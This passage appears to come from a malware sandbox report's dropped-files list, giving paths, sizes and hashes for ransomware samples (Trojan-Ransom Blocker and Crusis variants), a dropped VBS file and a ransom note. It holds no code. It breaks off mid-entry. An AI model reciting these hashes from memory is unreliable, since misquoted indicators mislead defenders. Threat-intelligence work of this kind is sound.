                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              181KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4ea6026cf93ec6338144661bf1202cd1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f1.vbs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              37219fd2d09abee4189a1ae33de93e2d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5e4cc26e169b6bd16843bcc86806556dac372c57

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2a0d2418a2504ad14960dcff54f0892339eeed53e359585c9b04a29c4e6e4274

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              626b89eb5b132ac43a6fb2d5dcc1c62349a6a48045a486835aa51c17348b0c4849cf5d56b4b56359c7bab5bdccaa04adf659f7486de84f9c14d86032272e5069

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              fc77e293a409e088049d7b63d232aa9d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              74c32112c02be8b9dfadb80b287871bb0a912e78

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              fb31f111d2eb2aa8a9db5fe9f975b788d4955022f20b427a288ba8bf56204afe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3c9c4a2e461981b2b4e1206bcf4915efd48864c1fc1c2e4a944429c572c8bd6104c3f27040cca7b174dc933ca4ba7d91bfec5ea7d98c338a9986f5cc9ab74d78

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              61KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5164cc2c878c324665a73f6c57b25aa7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1739c394f363222b05fc88580ee844cac101809b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5c3aef5ded42155ac9fc919f58ca1db5b866371fe7c604e79304aefada12519ae1315533dd7cfdfaebefefdd49b99c53c2a7963d3a3b68ee837ae07b8b01516b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              319KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              51788deded4adf8c0f2b73504ce9ef63

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              e506ac4936b2f54eb9f829170dbf3f51d889488a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ec2a72c9659da9392e181da5a7f17437d1c51383f6559ec990a0fac4f2f6a8238b9fda1f553f9f13e57cf89f2b065bdbc2fcbbc2dfb64d5701d72a4d48f6f3d9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              736KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              a5cf69f136de88f6826b2f97748fafc9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ee1ac69d7b988b6ba9a6f3dd533e1481590830aa

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8ea33b830ac6e226c7a7b05ae50af459ab4d7b8cac02f82590f7634891ba4cb3c0614fe37dcb54e5f0943fd83e5f534aa0e036f91da984affaaa13f47cdcec89

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              228KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              d27af0f0b985470e2f74de936a5296c8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              c9a3309e2a59d40fa2933dbb9e08850a3074878f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              afb28e315fe782ff3fd04871ff343756afafae0f46cd42d4cb57bd45b5435982b1d90a167d10e3e042bea847904baacf4d141a70c878cee11cd8597c4733e195

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              520KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7dbd73bd2dac0cd58bffc7195471b1b8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              e0a8fa034aad2d6f09173f02a9005accd7a516df

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              51a569a7fdc143760c078237a0e4889be8dbdf7883c92aed22a8c9f3feba4808223caab2ab7b0545467fca929dcbd18e179a3cc3a92db235a1b3d27806ab0106

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              962KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              524565f13ff3b4726d9af906682226f8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              84160c88bc70240fffe7b1d922f1e155fe90c2a6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              9683792a15224a0c282e7d688136c497a6ed9e89b67804716c63fd96ce21ce1ee2fa7865eb7163d7cc08a21064be95257612c91efa55bc06123b9308238c17b2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              270KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ac1bcabcee9633da00138eee84362c1c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              96ef5e46a2cc94a1bd2ea753db9bb6c7a67c2590

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              010648ec40ab34dcede27c4f69c0aa7778c6c76b16bcc1c8175879b44de33b0f18183b8ffd30ee93f426e79b55eb82f395dfc87b07638fd79518fa72c6be7a6b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              92KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              0a9a769931b1ecddb4784e319ae58153

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

